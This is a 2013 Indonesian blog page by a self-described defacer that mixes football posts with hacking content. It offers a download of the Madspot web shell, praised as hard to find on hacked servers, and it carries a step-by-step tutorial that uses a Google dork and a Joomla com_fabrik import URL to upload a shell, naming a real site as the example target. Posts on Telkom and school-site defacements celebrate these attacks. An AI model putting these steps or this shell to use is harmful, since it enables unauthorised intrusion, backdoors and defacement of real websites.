Sabtu, 20 April 2013

Download Madspot Shell v2

Posted by Erza Jullian 15.21, under | No comments

Kali ini saya akan share salah satu shell yang mungkin menjadi favorit para defacer. Setiap masuk ke web yang sudah tidak perawan [ dulunya pernah di hack ], rata-rata sudah terpasang shell ini. Ya, apalagi kalo bukan Madspot Shell. Sebenarnya ini shell rilis 2012, namun baru sempet share sekarang.

tapi ya nggak apa-apa lah, lebih baik terlambat daripada tidak samasekali.

Saya sendiri pun suka dengan shell ini. Berbeda dengan shell lain yang biasanya saya "kill" setelah digunakan, shell ini biasanya saya biarkan. Itu karena keberadaannya tidak terdeteksi oleh google. Sehingga privasi terjamin. Unuk fitur, saya kira standar alias nggak jelek-jelek amat. Malah bisa dibilang bagus. berikut beberapa fitur Madspot Shell :



SQL

Hash

Back Connect

Symlink

DDoS

Submit Zone-H

Kill Shell

Dan satu lagi keunggulan shell ini, yaitu keberadaannya yang tidak terdeteksi oleh google. Sehingga tidak ada yang bisa menemukan shell kita dengan google dork.



Ini Screenshootnya :



Untuk mendownload, silahkan klik link di bawah :

Download Madspot Shell

Password RAR : nabilah

Jumat, 19 April 2013

Ketika Seorang Lamer Ingin Dianggap Master

Posted by Erza Jullian 10.44, under | No comments

Sebelumnya saya minta maaf karena hampir seminggu tidak posting. Dan di postingan ini saya akan menceritakan pengalaman saya sekitar seminggu yang lalu. Tapi bukan curhat. :p

Oke, langsung saja. Seminggu yang lalu entah siapa yang meng-invite saya ke Salah satu grup Facebook [Nama grup tidak perlu disebutkan].

Karena saya member baru disitu, saya hanya bisa menyimak setiap post yang ada. Dan saya melihat ada post yang kira-kira berbunyi begini :"wah, seneng banget hari ini. Gue nge-hack lima FP anti JKT48" . Dan saya lihat komentar komentar yang hampir sama:"wah, master memang hebat !" . Kok segitu gampangnya percaya. Saya pun mengomentari:"link fpnya mana bro ?" . Eh dia malah jawab:"Rahasia gan" . Saya pun menjawab lagi:"nggak ada link berarti HOAX !!!!"



Entah mungkin karena ajwaban saya yang terlalu kasar, atau TSnya yang tidak mampu memberikan bukti, saya ditendang keluar dari Grup tersebut. Untung ada teman saya yang sama-sama dari JKT48 Hacker ada di grup itu. Saya pun kembali dimasukkan. :p



Kali ini lebih berhati-hati. Dan saya melihat salah satu post yang [mungkin] agak melecehkan grup tersebut. Melihat komentar-komentar yang bernada mengancam akan meng-hack akun si TS yang membuat post tadi. Namun saya melihat salah satu komentar yang menurut saya SOK BIJAK :"Maafkan master2 disini" . Mata saya tertuju pada kata "master" . Wah, saya member paling bodoh dong. :v . Isinya master semua. Saya pun ikut berkomentar:"maaf, sini master hack facebook semua ya. Sorry saya member baru" . Eh ada yang jawab :"Kami bukan hanya master hack facebook, tapi kami disini juga belajar deface web" . Dafuq, lagi-lagi member yang satu ini dengan bangganya menyebut dirinya master. Saya pun memberi komentar lagi:"ajarin dong master" . Dia pun menerangkan panjang lebar yang intinya menggunakan bug tiga teman palsu. L.O.L !!! Itu bug 2010 bung ! Saya yang bukan master saja tau. Saya pun berkomentar:"Bukannya bug itu sudah ditutup ya?" . "iya. tapi masih bisa" . Saya pun merasa lebih baik mengalah terhadap master yang satu ini. Pernyataan yang bodoh ! Wong bug sudah ditutup kok ngaku masih bisa ! Berarti bug nya belum ditutup !



Karena tidak ada gunanya meneruskan topik hack facebook tadi [saya tau itu bocah cuma bacod doang. Menang teori], saya pun menanyakan tentang aksi hacking/deface web. "master bisa deface web?" . Dia jawab :"bisa". "aktif di Zone-H?" . Dia menjawab:"level saya masih di Zone-A" . Hah ? Yang katanya master tapi tidak tau Website Zone-H ? Itu bukan level cok ! Itu Web submit hasil deface ! . Tapi saya biarkan saja. Saya pun lanjut bertanya:" biasanya deface pake cara apa?" . Lama tidak dijawab dan setelah saya ulang pertanyaan saya baru dia menjawab:"saya menggunakan virus untuk melihat password target. Virus tersebut saya kirim ke komputer korban" . Wah, teknik baru nih. Hacker sekelas elite pun saya kira sulit mempraktekkan bacotan anak ini. Saya pun tidak ambil pusing. Memberi pertanyaan yang saya yakin membuat dia mengaku kalo sebenarnya dia tidak pernah melakukan aksi deface. "Nick deface ente apa bro?" . Butuh waktu setengah jam dan dia menjawab:"rahasia bro. Nick itu hanya untuk menjual nama" . WTF !! Ternyata dia belum ngaku juga. Hanya saya biarkan karena tidak ada gunanya juga menanggapi seorang LAMER yang INGIN DIANGGAP MASTER !

Namun sejak saat itu dia jadi jarang koar-koar di grup. Mungkin malu atau takut kebodohannya terungkap.



Intinya, lebih baik anda jujur. Jika ada yang menyebut anda master, bersyukurlah karena masih ada yang menghargai anda. Tapi jika anda tidak benar-benar tau jawablah:"maaf, saya bukan master". Dengan tetap merendah namun tidak pelit berbagi ilmu. Jika tidak bisa, katakan tidak bisa. Karena berbohong hanya akan membuat anda semakin malu !



NB : Kejadian ini terjadi seminggu yang lalu saat saya masih punya FB. Sebenarnya saya ingin pula memberi screenshoot agar lebih meyakinkan. Namun saat ini saya tidak punya FB lantaran FB saya direport massal oleh Admin Jiplakers hanya berselang dua jam setelah dia mencuri artikel saya.

Sabtu, 13 April 2013

Hmei7 Hack Empat Situs TELKOM

Posted by Erza Jullian 13.28, under , | No comments

Malem-malem nggak bisa tidur saya akhirnya memutuskan untuk berselancar di Kaskus nyari hiburan. Eh, ada thread yang judulnya udah WOW banget. Situs Telkom kena hack cuy. Dan pelakunya adalah Hmei7. Siapakah dia ? Cari dewe di google, yang jelas Indonesian Top Defacer. Ranking 2 di Zone-H.



Ini screenshoot saat Website telkom.co.id di hack :





Untuk motifnya saya sendiri kurang tau. Yang jelas dia meninggalkan notice berikut




TELKOM INDONESIA hacked by Hmei7 



be secure, your security get down 



n1cedre4m@yahoo.com 



Masih seperti dulu, Real Hmei7 selalu meninggalkan alamat email n1cedre4m@yahoo.com. Mungkin dia hanya ingin meninggatkan akan lemahnya security situs Telkom. Dan apesnya bukan cuma telkom.co.id yang kena depes. Namun juga http://telkom.net, http://www.telkom.net.id, http://www.telkom-indonesia.com. Awalnya saya kira mass deface, tapi sepertinya bukan. Karena menurut mirror di zone-h, web telkom tadi lain IP. Hanya telkom.net dan telkom-indonesia.com yang IPnya sama.

Untuk mirrornya, silahkan lihat di daftar berikut :



Mirror of telkom.co.id

http://www.zone-h.org/mirror/id/19641511



Mirror of  telkom.net

http://www.zone-h.org/mirror/id/19641561



Mirror of telkom.net.id

http://www.zone-h.org/mirror/id/19641514



Mirror of telkom-indonesia.com

http://www.zone-h.org/mirror/id/19641512



Sekian info kali ini dan Salam Hacker Indonesia !

Jumat, 12 April 2013

Jadwal Semifinal Liga Champions

Posted by Erza Jullian 10.21, under , | No comments

Kemarin UEFA telah melakukan drawing babak semifinal Liga Champions Eropa. Hasilnya, dua klub Spanyol akan berhadapan dengan dua klub Jerman. Bayern Muenchen versus Barcelona dan Borussia Dortmund versus Real Madrid.

Berikut jadwal Semifinal Liga Champions 2013 :



Leg pertama semifinal akan dilangsungkan pada 23 dan 24 April 2013. Sedangkan leg kedua akan dimainkan pada 30 April dan 1 Mei 2013



Semifinal 1: Bayern Muenchen versus Barcelona

Semifinal 2: Borussia Dortmund versus Real Madrid



Sekian info kali ini. Dan tetap Hala Madrid ! . :v



NB : Untuk jam tayang belum ada info. Jika sudah, artikel ini akan segera saya update. Terimakasih.

Rabu, 10 April 2013

[History] Kekalahan Terbesar Dalam Sepak Bola

Posted by Erza Jullian 13.38, under | No comments

Duh, bahas hacking terus-terusan bikin bosen juga. Sampai lupa kalo sebenarnya blog ini juga membahas sepak bola. Dan kali ini saya akan membahas sejarah dalam sepak bola. Tepatnya adalah kekalahan terbesar dalam sejarah sepakbola.

Kekalahan terbesar dalam sepak bola diderita oleh Stade Olympique de L'Emyrne yang dihajar 149-0 oleh AS Adema. Namun kekalahan tersebut terasa tidak wajar karena sebenarnya pemain de L'Emyrne yang memasukkan seluruh gol ke gawangnya sendiri. Loh, kenapa ? Begini kronologinya :

Asosiasi sepak bola Madagaskar memutuskan untuk melarang beberapa pemain SO l'Emyrne dan pelatihnya, setelah mereka memutuskan untuk memprotes keputusan wasit yang membuat mereka kehilangan gelar juara dengan cara menembakkan bola ke gawang mereka sendiri.

Juara bertahan SO l'Emyrne ditahan imbang 2-2 oleh Domoina Soavina Atsimondrano oleh keputusan penalti yang kontroversial di menit akhir dalam turnamen bersistem round-robin untuk menentukan gelar juara liga.

Hasilnya, mereka memilih untuk menggunakan pertandingan terakhir mereka melawan sang juara yang baru, Adema, untuk menjelaskan posisi mereka. Para pemain Adema tidak mencetak gol-gol tersebut. Mereka hanya berdiri terpana, melihat sang lawan mencetak sejarah kekalahan kompetitif terbesar sepanjang sejarah dunia sepak bola.



Benar-benar aneh. Bunuh diri yang spektakuler. Hahaha . YA inilah sepakbola.



Sekian artikel kali ini, semoga bermanfaat.

Senin, 08 April 2013

Inilah Cara Hacker Tolak Ujian Nasional

Posted by Erza Jullian 05.01, under , | No comments

Ya, hacker selalu punya cara tersendiri untuk mengungkapkan sesuatu. Dulu saat kenaikan BBM, ribuan orang turun ke jalanan dan melakukan demo. Hacker hanya tinggal duduk tenang didepan komputer, eksploitasi web, hajar. Tinggalkan pesan dan berharap visitor ataupun webmaster situs yang dideface membaca pesan yang disampaikan.

Dan begitu pula kali ini. Saat pemerintah mencanangkan Ujian Nasional dengan 20 Paket Soal berbeda, Hacker melakukan aksi #OpUAN dengan mendeface situs-situs pendidikan dan menyampaikan pernyataan tidak setuju dengan diadakannya UJIAN NASIONAL. Mereka mengaggap idak adil rasanya jika apa yang kita pelajari selama 12tahun hanya ditentukan selama 4hari.





Berikut Notice yang saya dapat dari salah satu situs sekolahan yang berhasil dideface :



BAPAK PENGEN NINGKATIN MUTU PENDIDIKAN DENGAN UN ? BUKAN BEGITU CARANYA



UN HANYA ADA DI INDONESIA DAN HANYA DI INDONESIA , SETELAH 12 TAHUN DUDUK ,MENCORETI RIBUAN LEMBAR KOSONG ,BAPAK HANYA MELIHAT 4 HARI UNTUK 12 TAHUN , Festival Kami akan terus kami mulai jika peraturan ini makin labil dan membunuh kami ,INGAT PAK SEMUA SISWA PUNYA KEMAMPUAN YG TIDAK SAMA!

>> capil.balikpapan.go.id, bkd.malangkab.go.id, situs-pendidikan.com, lppm.unesa.ac.id, smpn2sutojayan.sch.id, sma2madiun.sch.id, bimbellbba.com and the next is ?? << Beri Kami Keadilan



Seharusnya pemerintah segera menanggapi protes yang disampaikan diatas karena jika tetap dibiarkan, mungkin dalam seminggu kedepan akan lebih banyak situs pendidikan yang bernasib sama dengan situs yang telah disebutkan diatas.



Sekian info kali ini. Terimakasih.

Sabtu, 06 April 2013

Deface Dengan Joomla Component [Com_Fabrik] Remote Shell Upload Vulnerability

Posted by Erza Jullian 12.38, under | No comments

Ini sebenarnya bug lama. Namun ternyata sampai sekarang masih ada saja situs yang vuln dengan bug ini. Tentu saja dengan kesabaran dalam mencari target dan kepandaian mengolah google dork.

Oke, langsung saja.

Google Dork :

inurl:index.php?option=com_fabrik atau index.php?option=com_fabrik [dork kreasikan sendiri. pemalas nggak bakalan sukses !]

Vulnerable path :

http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1



Sebagai contoh, saya pilih http://www.duo-d-art.ch/index.php?option=com_fabrik



Ubah urlnya menjadi : http://www.duo-d-art.ch/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1







Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV



Dan shell kita akan terletak di [site]/media/[shell.php]







Terus,  hajar !!!!




We Are Surabaya BlackHat !

Sekian tutorial kali ini, semoga bermanfaat.

Blog Archive

Blog Archive